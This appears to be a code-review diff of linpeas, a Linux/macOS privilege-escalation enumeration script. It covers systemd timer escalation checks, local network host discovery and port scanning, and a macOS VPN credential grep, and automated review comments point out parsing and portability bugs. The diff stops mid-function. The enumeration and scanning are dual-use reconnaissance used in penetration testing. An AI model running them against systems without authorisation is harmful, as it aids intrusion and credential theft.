# Check for relative paths in Unit directive
if grep -q "^Unit=[^/]" "$timer_file" 2>/dev/null; then
findings="${findings}RELATIVE_PATH: Uses relative path in Unit directive\n"
fi
# Check for writable executables in Unit directive (following symlinks)
local unit_path=$(grep -Po '^Unit=*(.*?$)' "$timer_file" 2>/dev/null | cut -d '=' -f2)
if [ -n "$unit_path" ]; then
if [ -L "$unit_path" ]; then
local target_unit=$(readlink -f "$unit_path")
if [ -w "$target_unit" ]; then
findings="${findings}WRITABLE_UNIT: Unit target file is writable: $target_unit\n"
fi
elif [ -w "$unit_path" ]; then
findings="${findings}WRITABLE_UNIT: Unit file is writable: $unit_path\n"
fi
fi
# If any findings, print them
if [ -n "$findings" ]; then
echo "Potential privilege escalation in timer file: $timer_file"
echo "$findings" | while read -r finding; do
[ -n "$finding" ] && echo " └─ $finding"
done
fi
}
# List all timers and check for privilege escalation vectors
print_3title "Active timers:"
systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do
# Extract timer unit name
timer_unit=$(echo "$line" | awk '{print $1}')
if [ -n "$timer_unit" ]; then
# Check if timer file is writable
timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
if [ -n "$timer_path" ]; then
check_timer_file "$timer_path"
fi
# Check timer content for privilege escalation vectors
check_timer_content "$timer_unit"
# Print the timer line with highlighting
echo "$line" | sed -${E} "s,$timersG,${SED_GREEN},"
fi
done || echo_not_found
# Check for disabled but available timers
print_3title "Disabled timers:"
systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
timer_unit=$(echo "$line" | awk '{print $1}')
if [ -n "$timer_unit" ]; then
timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
if [ -n "$timer_path" ]; then
check_timer_file "$timer_path"
fi
fi
done || echo_not_found
# Check timer files from PSTORAGE_TIMER
if [ -n "$PSTORAGE_TIMER" ]; then
print_3title "Additional timer files:"
printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do
if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then
check_timer_file "$timer_file"
fi
done
fi
echo ""
fi
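Review bot: the ExecStart parsing in `check_timer_content` does not match what `systemctl show -p ExecStart` actually prints (`ExecStart={ path=/usr/bin/foo ; argv[]=/usr/bin/foo ... ; ignore_errors=no ; ... }`): `cut -d= -f2` yields `{ path` and `cut -d' ' -f1` then yields `{`, so `exec_path` is the literal brace, the writable and 777 checks test a file named `{`, and RELATIVE_PATH is reported for every timer. Extract the `path=` field instead, for example `sed -n 's/.*path=\([^ ;]*\).*/\1/p'`. Related: `systemctl show ... -p User` prints an empty value when a service runs as root (User= is only set when overridden), so RUNS_AS_ROOT is flagged only for units that explicitly say User=root; treat empty as root. In `check_timer_file`, `Unit=` in a .timer holds a unit name such as foo.service, never a filesystem path, so RELATIVE_PATH fires for every timer that sets it and `[ -w "$unit_path" ]` tests a bare name against the current directory; resolve it with `systemctl show "$unit_path" -p FragmentPath` before testing writability. `grep -Po` is GNU-only, and the pattern `^Unit=*` means zero or more `=` signs. Finally, `$PSTORAGE_TIMER` is read but missing from the "Global Variables" header line.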


@ -1,192 +0,0 @@
###########################################
#---------) Network Information (---------#
###########################################
if [ "$MACOS" ]; then
print_2title "Network Capabilities"
warn_exec system_profiler SPNetworkDataType
echo ""
fi
#-- NI) Hostname, hosts and DNS
print_2title "Hostname, hosts and DNS"
cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
warn_exec dnsdomainname 2>/dev/null
echo ""
#-- NI) /etc/inetd.conf
if [ "$EXTRA_CHECKS" ]; then
print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
echo ""
fi
#-- NI) Interfaces
print_2title "Interfaces"
cat /etc/networks 2>/dev/null
(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
echo ""
#-- NI) Neighbours
if [ "$EXTRA_CHECKS" ]; then
print_2title "Networks and neighbours"
if [ "$MACOS" ]; then
netstat -rn 2>/dev/null
else
(route || ip n || cat /proc/net/route) 2>/dev/null
fi
(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
echo ""
fi
if [ "$MACPEAS" ]; then
print_2title "Firewall status"
warn_exec system_profiler SPFirewallDataType
fi
#-- NI) Iptables
if [ "$EXTRA_CHECKS" ]; then
print_2title "Iptables rules"
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
echo ""
fi
#-- NI) Ports
print_2title "Active Ports"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
echo ""
#-- NI) MacOS hardware ports
if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
print_2title "Hardware Ports"
networksetup -listallhardwareports
echo ""
print_2title "VLANs"
networksetup -listVLANs
echo ""
print_2title "Wifi Info"
networksetup -getinfo Wi-Fi
echo ""
print_2title "Check Enabled Proxies"
scutil --proxy
echo ""
print_2title "Wifi Proxy URL"
networksetup -getautoproxyurl Wi-Fi
echo ""
print_2title "Wifi Web Proxy"
networksetup -getwebproxy Wi-Fi
echo ""
print_2title "Wifi FTP Proxy"
networksetup -getftpproxy Wi-Fi
echo ""
fi
#-- NI) tcpdump
print_2title "Can I sniff with tcpdump?"
timeout 1 tcpdump >/dev/null 2>&1
if [ $? -eq 124 ]; then #If 124, then timed out == It worked
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
echo ""
#-- NI) Internet access
if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
print_2title "Internet Access?"
check_tcp_80 2>/dev/null &
check_tcp_443 2>/dev/null &
check_icmp 2>/dev/null &
check_dns 2>/dev/null &
wait
echo ""
fi
if [ "$AUTO_NETWORK_SCAN" ]; then
if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
printf $RED"[-] $SCAN_BAN_BAD\n$NC"
echo "The network is not going to be scanned..."
elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then
printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
echo "The network is not going to be scanned..."
else
print_2title "Scanning local networks (using /24)"
if ! [ "$PING" ] && ! [ "$FPING" ]; then
printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
fi
select_nc
local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
printf "%s\n" "$local_ips" | while read local_ip; do
if ! [ -z "$local_ip" ]; then
print_3title "Discovering hosts in $local_ip/24"
if [ "$PING" ] || [ "$FPING" ]; then
discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
fi
discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
rm $Wfolder/.ips.tmp 2>/dev/null
while read disc_ip; do
me=""
if [ "$disc_ip" = "$local_ip" ]; then
me=" (local)"
fi
echo "Scanning top ports of ${disc_ip}${me}"
(tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
echo ""
done < $Wfolder/.ips
rm $Wfolder/.ips 2>/dev/null
echo ""
fi
done
print_3title "Scanning top ports of host.docker.internal"
(tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
echo ""
fi
fi
if [ "$MACOS" ]; then
print_2title "Any MacOS Sharing Service Enabled?"
rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
echo ""
print_2title "VPN Creds"
system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
echo ""
if [ "$EXTRA_CHECKS" ]; then
print_2title "Bluetooth Info"
warn_exec system_profiler SPBluetoothDataType
echo ""
print_2title "Ethernet Info"
warn_exec system_profiler SPEthernetDataType
echo ""
print_2title "USB Info"
warn_exec system_profiler SPUSBDataType
echo ""
fi
fi
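Review bot: before this file is removed, confirm that every check in it has a home in the new modules, because three of them are not in any of the files added in this diff: the `AUTO_NETWORK_SCAN` block (local /24 host discovery, per-host port scans and the `host.docker.internal` scan), the `/etc/inetd.conf`/`/etc/xinetd.conf` dump under `EXTRA_CHECKS`, and the macOS fallback for "Active Ports" (`netstat -punta || ss -nltpu || netstat -anv`, where `netstat -anv` is the only variant that works on macOS). The old "Internet Access?" section was also gated on `[ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]`; the replacement module runs unconditionally, which should be a deliberate choice.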

View File

@ -0,0 +1,40 @@
# Title: Network Information - MacOS hardware ports
# ID: NT_Macos_hardware_ports
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Enumerate macOS hardware ports
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables: $EXTRA_CHECKS, $MACPEAS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
print_2title "Hardware Ports"
networksetup -listallhardwareports
echo ""
print_2title "VLANs"
networksetup -listVLANs
echo ""
print_2title "Wifi Info"
networksetup -getinfo Wi-Fi
echo ""
print_2title "Check Enabled Proxies"
scutil --proxy
echo ""
print_2title "Wifi Proxy URL"
networksetup -getautoproxyurl Wi-Fi
echo ""
print_2title "Wifi Web Proxy"
networksetup -getwebproxy Wi-Fi
echo ""
fi
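Review bot: this module drops the "Wifi FTP Proxy" check (`networksetup -getftpproxy Wi-Fi`) that the removed file ran in the same block; if that is intentional it is worth a line in the PR description. The remaining `networksetup -getinfo` / `-getautoproxyurl` / `-getwebproxy` calls hard-code the service name `Wi-Fi`, which only exists on machines where the Wi-Fi service was not renamed; iterating `networksetup -listallnetworkservices` (as the network-capabilities module below already does) would cover Ethernet and renamed services too.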

View File

@ -0,0 +1,52 @@
# Title: Network Information - Internet access
# ID: NT_Internet_access
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check for internet access
# License: GNU GPL
# Version: 1.0
# Functions Used: check_dns, check_icmp, check_tcp_443, check_tcp_443_bin, check_tcp_80, print_2title, check_external_hostname
# Global Variables:
# Initial Functions:
# Generated Global Variables: $pid4, $pid2, $pid1, $pid3, $$tcp443_bin_status, $NOT_CHECK_EXTERNAL_HOSTNAME, $TIMEOUT_INTERNET_SECONDS
# Fat linpeas: 0
# Small linpeas: 0
print_2title "Internet Access?"
TIMEOUT_INTERNET_SECONDS=5
if [ "$SUPERFAST" ]; then
TIMEOUT_INTERNET_SECONDS=2.5
fi
# Run all checks in background
check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$!
check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$!
check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$!
check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$!
# Kill all after 10 seconds
(sleep $(( $TIMEOUT_INTERNET_SECONDS + 1 )) && kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) &
check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null
tcp443_bin_status=$?
wait $pid1 $pid2 $pid3 $pid4 2>/dev/null
# Wait for all to finish
wait 2>/dev/null
if [ "$tcp443_bin_status" -eq 0 ] && \
[ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then
echo ""
print_2title "Is hostname malicious or leaked?"
print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host."
check_external_hostname 2>/dev/null
fi
echo ""
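Review bot: with `SUPERFAST` set, `TIMEOUT_INTERNET_SECONDS=2.5` makes `$(( $TIMEOUT_INTERNET_SECONDS + 1 ))` fail, since shell arithmetic is integer-only ("invalid arithmetic operator" in bash, an arithmetic expression error in dash), so the watchdog subshell never starts and the background checks are not killed. Use an integer here (e.g. `TIMEOUT_INTERNET_SECONDS=2`) or compute the kill delay without arithmetic. Two smaller things: the comment `# Kill all after 10 seconds` does not match the `TIMEOUT + 1` that is actually used, and the header line `Generated Global Variables:` has a typo in `$$tcp443_bin_status`.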

View File

@ -0,0 +1,76 @@
# Title: Network Information - Network interfaces
# ID: NT_Network_interfaces
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Check network interfaces
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title
# Global Variables:
# Initial Functions:
# Generated Global Variables: $iface, $state, $mac, $ip_file, $line
# Fat linpeas: 0
# Small linpeas: 1
# Function to parse network interfaces from /proc/net/dev and other sources
parse_network_interfaces() {
# Try to get interfaces from /proc/net/dev
if [ -f "/proc/net/dev" ]; then
echo "Network Interfaces from /proc/net/dev:"
echo "----------------------------------------"
# Skip header lines and format output
grep -v "^Inter\|^ face" /proc/net/dev | while read -r line; do
iface=$(echo "$line" | awk -F: '{print $1}' | tr -d ' ')
if [ -n "$iface" ]; then
echo "Interface: $iface"
# Try to get IP address from /sys/class/net
if [ -f "/sys/class/net/$iface/address" ]; then
mac=$(cat "/sys/class/net/$iface/address" 2>/dev/null)
echo " MAC: $mac"
fi
# Try to get IP from /sys/class/net
if [ -d "/sys/class/net/$iface/ipv4" ]; then
for ip_file in /sys/class/net/$iface/ipv4/addr_*; do
if [ -f "$ip_file" ]; then
ip=$(cat "$ip_file" 2>/dev/null)
echo " IP: $ip"
fi
done
fi
# Get interface state
if [ -f "/sys/class/net/$iface/operstate" ]; then
state=$(cat "/sys/class/net/$iface/operstate" 2>/dev/null)
echo " State: $state"
fi
echo ""
fi
done
fi
# Try to get additional info from /proc/net/fib_trie
if [ -f "/proc/net/fib_trie" ]; then
echo "Additional IP Information from fib_trie:"
echo "----------------------------------------"
grep -A1 "Main" /proc/net/fib_trie | grep -v "\-\-" | while read -r line; do
if echo "$line" | grep -q "Main"; then
echo "Network: $(echo "$line" | awk '{print $2}')"
elif echo "$line" | grep -q "/"; then
echo " IP: $(echo "$line" | awk '{print $2}')"
fi
done
fi
}
print_2title "Interfaces"
cat /etc/networks 2>/dev/null
# Try standard tools first, then fall back to our custom function
if command -v ifconfig >/dev/null 2>&1; then
ifconfig 2>/dev/null
elif command -v ip >/dev/null 2>&1; then
ip a 2>/dev/null
else
parse_network_interfaces
fi
echo ""
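Review bot: the IPv4 fallback in `parse_network_interfaces` reads `/sys/class/net/$iface/ipv4/addr_*`, but sysfs exposes no `ipv4` directory under a network interface (only `address`, `operstate`, `mtu`, `statistics`, ...), so that branch never prints an address. Without `ip`/`ifconfig`, local addresses can be recovered from `/proc/net/fib_trie` by taking the lines preceding `/32 host LOCAL`; the existing fib_trie pass does not do that either, because `grep -A1 "Main"` keeps only the single line after `Main:` and `awk '{print $2}'` on `Main:` is empty. The comment `# Try to get IP address from /sys/class/net` sits above the MAC read and should say MAC. `$ip` is also missing from the `Generated Global Variables:` header.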

View File

@ -0,0 +1,107 @@
# Title: Network Information - Hostname, hosts and DNS
# ID: NT_Hostname_hosts_dns
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Get hostname, hosts and DNS
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, warn_exec
# Global Variables:
# Initial Functions:
# Generated Global Variables: $conf, $line
# Fat linpeas: 0
# Small linpeas: 1
# Function to get hostname using multiple methods
get_hostname_info() {
print_3title "Hostname Information"
# Try multiple methods to get hostname
if command -v hostname >/dev/null 2>&1; then
echo "System hostname: $(hostname 2>/dev/null)"
echo "FQDN: $(hostname -f 2>/dev/null)"
else
# Fallback methods
if [ -f "/proc/sys/kernel/hostname" ]; then
echo "System hostname: $(cat /proc/sys/kernel/hostname 2>/dev/null)"
fi
if [ -f "/etc/hostname" ]; then
echo "Hostname from /etc/hostname: $(cat /etc/hostname 2>/dev/null)"
fi
fi
echo ""
}
# Function to get hosts file information
get_hosts_info() {
print_3title "Hosts File Information"
if [ -f "/etc/hosts" ]; then
echo "Contents of /etc/hosts:"
grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do
echo " $line"
done
fi
echo ""
}
# Function to get DNS information
get_dns_info() {
print_3title "DNS Configuration"
# Get resolv.conf information
if [ -f "/etc/resolv.conf" ]; then
echo "DNS Servers (resolv.conf):"
grep -v "^#" /etc/resolv.conf 2>/dev/null | grep -v "^$" | while read -r line; do
if echo "$line" | grep -q "nameserver"; then
echo " $(echo "$line" | awk '{print $2}')"
elif echo "$line" | grep -q "search\|domain"; then
echo " $line"
fi
done
fi
# Check for systemd-resolved configuration
if [ -f "/etc/systemd/resolved.conf" ]; then
echo -e "\nSystemd-resolved configuration:"
grep -v "^#" /etc/systemd/resolved.conf 2>/dev/null | grep -v "^$" | while read -r line; do
echo " $line"
done
fi
# Check for NetworkManager DNS settings
if [ -d "/etc/NetworkManager" ]; then
echo -e "\nNetworkManager DNS settings:"
find /etc/NetworkManager -type f -name "*.conf" 2>/dev/null | while read -r conf; do
if grep -q "dns=" "$conf" 2>/dev/null; then
echo " From $conf:"
grep "dns=" "$conf" 2>/dev/null | while read -r line; do
echo " $line"
done
fi
done
fi
# Try to get DNS domain name
echo -e "\nDNS Domain Information:"
if command -v dnsdomainname >/dev/null 2>&1; then
warn_exec dnsdomainname 2>/dev/null
fi
if command -v domainname >/dev/null 2>&1; then
warn_exec domainname 2>/dev/null
fi
# Check for DNS cache status
if command -v systemd-resolve >/dev/null 2>&1; then
echo -e "\nDNS Cache Status (systemd-resolve):"
systemd-resolve --status 2>/dev/null | grep -A5 "DNS Servers" | grep -v "\-\-" | while read -r line; do
echo " $line"
done
fi
echo ""
}
print_2title "Hostname, hosts and DNS"
# Execute all information gathering functions
get_hostname_info
get_hosts_info
get_dns_info
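Review bot: `echo -e "\n..."` (used three times in `get_dns_info`) is not POSIX; under `/bin/sh` on Debian/Ubuntu (dash) it prints a literal `-e` followed by the text with the backslash unexpanded. Since the rest of linpeas keeps sh compatibility, use `printf "\n%s\n" "..."` instead. Likewise `grep -q "search\|domain"` relies on the GNU `\|` alternation; `grep -Eq "search|domain"` is portable. `systemd-resolve --status` is deprecated in favour of `resolvectl status` and is absent on newer systemd releases, so check for `resolvectl` first and fall back to `systemd-resolve`.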

View File

@ -0,0 +1,138 @@
# Title: Network Information - Network neighbours
# ID: NT_Network_neighbours
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Networks and neighbours
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title
# Global Variables: $EXTRA_CHECKS, $MACPEAS
# Initial Functions:
# Generated Global Variables: $hwtype, $flags, $line, $iface, $dest, $ref, $use, $mask, $metric, $device, $hwaddr
# Fat linpeas: 0
# Small linpeas: 0
# Function to parse routing information from /proc/net/route
parse_proc_route() {
print_3title "Routing Table (from /proc/net/route)"
echo "Destination Gateway Genmask Flags Metric Ref Use Iface"
echo "--------------------------------------------------------------------------------"
# Skip header line and process each route
tail -n +2 /proc/net/route 2>/dev/null | while read -r line; do
if [ -n "$line" ]; then
# Extract fields
iface=$(echo "$line" | awk '{print $1}')
dest=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($2,7,2), substr($2,5,2), substr($2,3,2), substr($2,1,2)}'))
gw=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($3,7,2), substr($3,5,2), substr($3,3,2), substr($3,1,2)}'))
mask=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($4,7,2), substr($4,5,2), substr($4,3,2), substr($4,1,2)}'))
flags=$(echo "$line" | awk '{print $5}')
metric=$(echo "$line" | awk '{print $6}')
ref=$(echo "$line" | awk '{print $7}')
use=$(echo "$line" | awk '{print $8}')
# Print formatted output
printf "%-18s %-15s %-15s %-6s %-6s %-6s %-6s %s\n" "$dest" "$gw" "$mask" "$flags" "$metric" "$ref" "$use" "$iface"
fi
done
echo ""
}
# Function to parse ARP information from /proc/net/arp
parse_proc_arp() {
print_3title "ARP Table (from /proc/net/arp)"
echo "IP address HW type Flags HW address Mask Device"
echo "------------------------------------------------------------------------"
# Skip header line and process each ARP entry
tail -n +2 /proc/net/arp 2>/dev/null | while read -r line; do
if [ -n "$line" ]; then
ip=$(echo "$line" | awk '{print $1}')
hwtype=$(echo "$line" | awk '{print $2}')
flags=$(echo "$line" | awk '{print $3}')
hwaddr=$(echo "$line" | awk '{print $4}')
mask=$(echo "$line" | awk '{print $5}')
device=$(echo "$line" | awk '{print $6}')
# Print formatted output
printf "%-15s %-11s %-9s %-18s %-8s %s\n" "$ip" "$hwtype" "$flags" "$hwaddr" "$mask" "$device"
fi
done
echo ""
}
# Function to get network neighbors information
get_network_neighbors() {
print_2title "Networks and neighbours"
# Get routing information
print_3title "Routing Information"
if [ "$MACPEAS" ]; then
# macOS specific
if command -v netstat >/dev/null 2>&1; then
netstat -rn 2>/dev/null
else
echo "No routing information available"
fi
else
# Linux systems
if command -v ip >/dev/null 2>&1; then
ip route 2>/dev/null
echo -e "\nNeighbor table:"
ip neigh 2>/dev/null
elif command -v route >/dev/null 2>&1; then
route -n 2>/dev/null
elif [ -f "/proc/net/route" ]; then
parse_proc_route
else
echo "No routing information available"
fi
fi
# Get ARP information
print_3title "ARP Information"
if command -v arp >/dev/null 2>&1; then
if [ "$MACPEAS" ]; then
arp -a 2>/dev/null
else
arp -e 2>/dev/null || arp -a 2>/dev/null
fi
elif [ -f "/proc/net/arp" ]; then
parse_proc_arp
else
echo "No ARP information available"
fi
# Additional neighbor discovery methods
print_3title "Additional Neighbor Information"
# Check for IPv6 neighbors if available
if [ -f "/proc/net/ipv6_neigh" ]; then
echo "IPv6 Neighbors:"
cat /proc/net/ipv6_neigh 2>/dev/null | grep -v "^IP" | while read -r line; do
if [ -n "$line" ]; then
echo " $line"
fi
done
fi
# Try to get LLDP neighbors if available
if command -v lldpctl >/dev/null 2>&1; then
echo -e "\nLLDP Neighbors:"
lldpctl 2>/dev/null | grep -A2 "Interface:" | while read -r line; do
echo " $line"
done
fi
# Try to get CDP neighbors if available
if command -v cdp >/dev/null 2>&1; then
echo -e "\nCDP Neighbors:"
cdp 2>/dev/null | grep -v "^$" | while read -r line; do
echo " $line"
done
fi
echo ""
}
if [ "$EXTRA_CHECKS" ]; then
get_network_neighbors
fi
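Review bot: the field mapping in `parse_proc_route` is off by the layout of `/proc/net/route`, whose columns are `Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT`: the code decodes `$4` as the mask (it is Flags) and prints `$5`/`$6`/`$7`/`$8` as Flags/Metric/Ref/Use, while the real mask is `$8`, RefCnt `$5`, Use `$6` and Metric `$7`. With the current code the "Genmask" column is built from the 4-character Flags value and comes out wrong for every route. Two more points: `/proc/net/ipv6_neigh` does not exist on Linux (IPv6 neighbours are only reachable via netlink, i.e. `ip -6 neigh`), so the "IPv6 Neighbors" branch is dead; and when `ip` is present the neighbour table is already printed under "Routing Information", then `arp -e` prints it again under "ARP Information". `$gw` and `$ip` are also missing from the `Generated Global Variables:` header.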

View File

@ -0,0 +1,177 @@
# Title: Network Information - Open ports
# ID: NT_Open_ports
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Enumerate open ports
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title, print_info
# Global Variables: $E, $SED_RED
# Initial Functions:
# Generated Global Variables: $pid_dir, $tx_queue, $pid, $rem_port, $proc_file, $rem_ip, $local_ip, $rx_queue, $proto, $rem_addr, $program, $state, $header_sep, $proc_info, $inode, $header, $line, $local_addr, $local_port
# Fat linpeas: 0
# Small linpeas: 1
# Function to get process info from inode
get_process_info() {
local inode=$1
local pid=""
local program=""
if [ -n "$inode" ]; then
for pid_dir in /proc/[0-9]*/fd; do
if [ -d "$pid_dir" ]; then
if ls -l "$pid_dir" 2>/dev/null | grep -q "$inode"; then
pid=$(echo "$pid_dir" | awk -F/ '{print $3}')
if [ -f "/proc/$pid/cmdline" ]; then
program=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1)
program=$(basename "$program")
fi
break
fi
fi
done
fi
echo "$pid/$program"
}
# Function to parse /proc/net/tcp and /proc/net/udp files
parse_proc_net_ports() {
local proto=$1
local proc_file="/proc/net/$proto"
local header="Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name"
local header_sep="--------------------------------------------------------------------------------"
if [ -f "$proc_file" ]; then
print_3title "Active $proto Ports (from /proc/net/$proto)"
echo "$header"
echo "$header_sep"
# Process each connection using a pipe
tail -n +2 "$proc_file" 2>/dev/null | while IFS= read -r line; do
[ -z "$line" ] && continue
# Skip header
case "$line" in
*"sl"*) continue ;;
*) : ;;
esac
# Extract fields using awk
sl=$(echo "$line" | awk '{print $1}')
local_addr=$(echo "$line" | awk '{print $2}')
rem_addr=$(echo "$line" | awk '{print $3}')
st=$(echo "$line" | awk '{print $4}')
tx_queue=$(echo "$line" | awk '{print $5}')
rx_queue=$(echo "$line" | awk '{print $6}')
uid=$(echo "$line" | awk '{print $7}')
inode=$(echo "$line" | awk '{print $10}')
# Convert hex IP:port to decimal
local_ip=$(printf "%d.%d.%d.%d" $(echo "$local_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
local_port=$(printf "%d" "0x$(echo "$local_addr" | awk -F: '{print $2}')")
rem_ip=$(printf "%d.%d.%d.%d" $(echo "$rem_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
rem_port=$(printf "%d" "0x$(echo "$rem_addr" | awk -F: '{print $2}')")
# Get process information
proc_info=$(get_process_info "$inode")
# Get state name
case $st in
"01") state="ESTABLISHED" ;;
"02") state="SYN_SENT" ;;
"03") state="SYN_RECV" ;;
"04") state="FIN_WAIT1" ;;
"05") state="FIN_WAIT2" ;;
"06") state="TIME_WAIT" ;;
"07") state="CLOSE" ;;
"08") state="CLOSE_WAIT" ;;
"09") state="LAST_ACK" ;;
"0A") state="LISTEN" ;;
"0B") state="CLOSING" ;;
"0C") state="NEW_SYN_RECV" ;;
*) state="UNKNOWN" ;;
esac
# Only show listening ports
if [ "$state" = "LISTEN" ]; then
# Format the output
printf "%-6s %-8s %-8s %-21s %-21s %-12s %s\n" \
"$proto" "$rx_queue" "$tx_queue" "$local_ip:$local_port" "$rem_ip:$rem_port" "$state" "$proc_info"
fi
done
fi
echo ""
}
# Function to get open ports information
get_open_ports() {
print_2title "Active Ports"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports"
# Try standard tools first
if command -v netstat >/dev/null 2>&1; then
print_3title "Active Ports (netstat)"
netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
elif command -v ss >/dev/null 2>&1; then
print_3title "Active Ports (ss)"
ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
else
# Fallback to parsing /proc/net files
parse_proc_net_ports "tcp"
parse_proc_net_ports "udp"
fi
# Additional port information
if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
print_3title "Additional Port Information"
# Check for listening ports in /proc/net/unix
